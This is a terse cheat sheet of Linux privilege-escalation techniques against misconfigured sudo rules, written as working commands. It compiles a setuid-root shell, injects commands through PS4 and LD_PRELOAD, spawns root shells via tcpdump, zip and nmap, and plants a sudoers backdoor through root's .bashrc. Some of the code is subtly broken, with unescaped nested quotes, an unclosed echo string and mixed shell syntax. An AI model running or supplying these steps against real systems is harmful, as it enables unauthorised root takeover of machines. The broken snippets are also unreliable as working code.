First check what your commands and environment limitations are with
sudo -l
Then check permissions on the files you are allowed to run and on the folders that contain them
If you can modify file you already know what to do. If the folder is wide open remove and create a link from the file you can run to your code.
If environment is inherited from the user, set PS4, LD_PRELOAD, PERL5OPT, PYTHONINSPECT etc.
echo -e "int main() { setgid(0); setuid(0); execl("/bin/sh","sh",0);}" | gcc -o egg -
setenv SHELLOPTS xtrace
setenv PS4 '$(chown 0:0 egg)'
sudo ./command
setenv PS4 '$(chmod +xs egg)'
sudo ./command
./egg
LD_PRELOAD
echo -e "int main() { setgid(0); setuid(0); execl("/bin/sh","sh",0);}" | gcc -o /tmp/egg -
echo -e "#include <unistd.h>\n#include <stdio.h>\n#include <sys/types.h>\n#include <stdlib.h>\nvoid _init(){ if (!geteuid()) { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); execl("/bin/sh","sh","-c","chown 0:0 /tmp/egg; /bin/chmod +xs /tmp/egg",NULL); }} | gcc -o preloader.o -fPIC -
gcc -shared -Wl,-soname,libno_ex.so.1 -o /tmp/libno_ex.so.1.0 preloader.o -nostartfiles
sudo LD_PRELOAD=/tmp/libno_ex.so.1.0 command
Otherwise look for running a custom script from the allowed command. Examples:
tcpdump
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z shell.sh -Z root
zip
zip -U in.zip -O out.zip -T -TT '/bin/bash #'
nmap
echo "os.execute('/bin/sh')" > shell.lua
sudo /usr/bin/nmap --script shell.lua
Look for interactive commands and see if you can escape them (! to call shell from vi or less) or overwrite/change
For example you can use --interactive
option in the older nmap
Another option is to use file output to overwrite the file itself with the custom script. Backup first, run shell, cleanup after cp command /tmp/command.bak sudo command -log command “; /bin/bash; cat /tmp/command.bak > command”
Last option is to try use an option to write to a file.
Softlink that file to the root .bashrc, add a command to get you root and wait for root to login
"$(echo -e "\necho 'me ALL=(ALL) ALL' > /etc/sudoers.d/getroot ")